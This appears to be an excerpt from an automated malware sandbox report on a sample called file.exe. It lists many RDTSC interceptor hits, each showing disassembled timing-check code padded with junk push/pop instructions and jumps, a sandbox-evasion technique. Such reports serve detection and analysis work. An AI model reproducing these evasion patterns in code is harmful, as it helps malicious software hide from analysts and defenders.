Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA243 second address: DFA271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B475h 0x00000007 push edi 0x00000008 jno 00007FB77110B466h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jg 00007FB77110B48Ah 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA7F2 second address: DFA800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFADE3 second address: DFADFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB77110B478h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFADFF second address: DFAE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB770CC1306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB3C2 second address: DFB3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB77110B477h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB3E4 second address: DFB40F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1319h 0x00000007 jnp 00007FB770CC1306h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FB770CC130Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB6DD second address: DFB6E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB6E4 second address: DFB6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB9E3 second address: DFBA07 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB77110B474h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFBA07 second address: DFBA17 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FB770CC1312h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFBA17 second address: DFBA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB77110B466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00775 second address: E00788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB770CC1306h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FB770CC1306h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E03B7D second address: E03B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FB77110B478h 0x0000000f jmp 00007FB77110B472h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E03E3B second address: E03E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E04446 second address: E0444E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0444E second address: E04471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB770CC130Ch 0x0000000e jmp 00007FB770CC130Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E04471 second address: E04475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0C8FD second address: E0C91C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB770CC1319h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0AA59 second address: E0AA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FB77110B466h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jns 00007FB77110B466h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0AA70 second address: E0AA8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB770CC1316h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0ABDF second address: E0ABED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FB77110B468h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0ABED second address: E0ABF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B2CE second address: E0B2D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B2D4 second address: E0B2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B2DA second address: E0B2E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B2E6 second address: E0B2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B431 second address: E0B435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B435 second address: E0B452 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB770CC1317h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B452 second address: E0B46A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB77110B46Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B46A second address: E0B46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B46E second address: E0B478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B478 second address: E0B482 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB770CC1306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B482 second address: E0B494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB77110B46Ch 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0B73B second address: E0B74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jne 00007FB770CC1306h 0x0000000c jnl 00007FB770CC1306h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0BFBE second address: E0BFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0BFC2 second address: E0BFC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0BFC8 second address: E0BFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0BFCE second address: E0BFD5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0BFD5 second address: E0BFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0C773 second address: E0C778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0C778 second address: E0C79B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB77110B477h 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0C79B second address: E0C7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E158BA second address: E158D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB77110B479h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1532D second address: E15331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E15331 second address: E1533A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1533A second address: E15340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E15340 second address: E15347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E15347 second address: E15357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB770CC130Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E15357 second address: E15369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FB77110B487h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E21598 second address: E215B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1316h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E215B6 second address: E215BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E21702 second address: E21770 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC1312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB770CC1313h 0x0000000e pushad 0x0000000f jo 00007FB770CC1306h 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007FB770CC1319h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007FB770CC1319h 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E21770 second address: E21779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E21779 second address: E2177D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2177D second address: E2178B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FB77110B466h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E266E5 second address: E266EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E29362 second address: E2937F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FB77110B474h 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E37A70 second address: E37A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E378E0 second address: E378ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB77110B466h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3F495 second address: E3F4AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB770CC130Bh 0x00000007 jmp 00007FB770CC130Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3F4AF second address: E3F4B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3F4B6 second address: E3F4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3F4BF second address: E3F4C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3DF2E second address: E3DF4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB770CC1314h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3DF4A second address: E3DF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB77110B46Ch 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3DF5C second address: E3DF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3DF60 second address: E3DF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a jmp 00007FB77110B46Bh 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3DF79 second address: E3DF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E0B1 second address: E3E0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E0BB second address: E3E0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E0C1 second address: E3E0D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E0D0 second address: E3E0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB770CC1315h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FB770CC130Dh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E0F9 second address: E3E105 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB77110B46Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E546 second address: E3E54A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E54A second address: E3E56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FB77110B479h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E56B second address: E3E57E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB770CC130Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E6C8 second address: E3E6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB77110B46Fh 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E6DE second address: E3E6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB770CC130Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3E6F0 second address: E3E6F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E40C3A second address: E40C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E40C3E second address: E40C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB77110B474h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E45160 second address: E45179 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB770CC1311h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E45179 second address: E451A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FB77110B46Ah 0x0000000d jmp 00007FB77110B476h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44CF8 second address: E44CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44E91 second address: E44EA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FB77110B468h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44EA6 second address: E44EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB770CC1306h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44EB2 second address: E44EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E71BBE second address: E71BC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7202A second address: E7202E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7202E second address: E72051 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB770CC1306h 0x00000008 ja 00007FB770CC1306h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 jl 00007FB770CC1322h 0x00000017 jp 00007FB770CC1308h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E72051 second address: E72055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7242D second address: E72437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB770CC1306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E72437 second address: E7243B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E754A0 second address: E754EE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB770CC1308h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FB770CC1308h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 movzx edx, bx 0x0000002a jc 00007FB770CC130Bh 0x00000030 mov edx, 168FB9F6h 0x00000035 push 00000004h 0x00000037 mov edx, dword ptr [ebp+1247BBD9h] 0x0000003d push 6D03120Eh 0x00000042 push eax 0x00000043 push edx 0x00000044 jp 00007FB770CC1308h 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E757B8 second address: E757DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB77110B474h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E757DA second address: E757E4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB770CC1306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E76A57 second address: E76A64 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB77110B466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E76A64 second address: E76A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FB770CC130Ch 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
